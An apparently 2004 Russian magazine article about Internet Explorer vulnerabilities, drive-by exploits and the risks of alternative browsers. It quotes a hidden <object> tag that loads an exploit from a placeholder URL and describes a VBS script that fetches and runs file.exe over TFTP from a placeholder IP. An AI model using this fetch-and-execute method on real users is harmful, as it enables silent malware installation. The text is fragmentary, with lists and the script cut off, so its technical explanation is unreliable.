Internet Exploiter 23.03.2004 Андрей Соколов
Нескольких несложных манипуляций с настройками безопасности ОС Windows XP достаточно, чтобы уберечь систему от лобовых атак. В случае установки файрволла и запрета доставки данных на порты, занятые сервисами системы, о лобовых атаках (как уже известных, так и нет) можно забыть. Однако существует особый вид опасностей, связанных с многочисленными уязвимостями встроенного в Windows браузера Internet Explorer (IE). Многие читатели наверняка не раз сталкивались с этой проблемой: недобросовестные веб-мастеры не гнушаются получать несанкционированный доступ в личное пространство пользователя и насильственно открывать свои линки спустя некоторое время после того, как пользователь покинул их сайты1. Постепенно входят в моду управляемые вирусы, внедряющиеся с «нехороших» сайтов и выполняющие самые разнообразные задачи. Такие, например, как: - рассылка спама; IE — один из основных компонентов ОС Windows, и многие программы в этой системе используют элементы IE в процессе работы. К таким программам относится, например, почтовый клиент MS Outlook Express, обрабатывающий HTML с помощью соответствующего элемента IE. Ситуация усугубляется тем, что дыр, найденных в IE, едва ли не больше, чем во всех сервисах операционной системы Windows XP вместе взятых. Кроме того, корпорация Microsoft не всегда быстро и адекватно реагирует на обнаружение очередной дырки в IE2, и поэтому с уверенностью можно утверждать: браузер Internet Explorer уязвим патологически. Проникновение в систему через дыру в браузере происходит при непосредственном участии пользователя. В отличие от лобовых атак, когда взломщик может лишь долбить порты удаленной системы и его легко остановить при помощи настройки безопасности системы или файрволла, спектр возможностей проникновения через IE весьма широк. Наиболее очевидные способы таковы: - вступить в электронную переписку с пользователем (например, через Интернет-пейджер ICQ) и заманить его на какой-нибудь сайт в Интернете с заранее приготовленной страничкой, содержащей эксплойт; Уязвимости Internet Explorer можно разделить на две основные группы: - уязвимости фундаментального свойства (переполнение буферов или адресного пространства программы), позволяющие злоумышленнику внедрять и исполнять код непосредственно в контексте IE (к этой группе можно отнести пресловутую ошибку в парсинге BMP-файлов); - Internet Explorer загружает HTML-страницу, в теле которой содержится такой HTML-код: <object data=«http://way/to/get/exploited» width=0 height=0>, где http://way/to/get/exploited — линк на заранее приготовленный злоумышленником особый объект. - Internet Explorer создает поток для обработки тегов <object>. Поток обращается по линку way/to/get/exploited, запрашивая у сервера этот объект. <script language=vbs> где XX.XX.XX.XX — IP-адрес гипотетического Интернет-сервера, имеющего сервис TFTP (Trivial File Transfer Protocol, работающий по протоколу UDP) и готового раздавать file.exe любому желающему по первому запросу. Скрипт подождет завершения клиентской программы tftp.exe и запустит полученный file.exe. Кстати, пользователям альтернативных браузеров (Opera, Netscape и Mozilla) не стоит расслабляться. Существует множество сообщений о различного рода уязвимостях в перечисленных браузерах (security.nnov.ru/search/soft.asp?sofname=opera, security.nnov.ru/search/soft.asp?sofname=netscape, security.nnov.ru/search/soft.asp?sofname=mozilla). Налицо тенденция: по мере роста популярности браузера количество найденных дыр и уровень возможной опасности, их сопровождающей, увеличивается. Например, почти каждая версия браузера Opera (за исключением самой последней доступной на данный момент версии 7.23) уязвима. В то же время количество и характер уязвимостей браузера Mozilla позволяют сказать, что пользоваться им практически безопасно. 1 Грешат подобной навязчивостью, как правило, порно- и warez-сайты.
|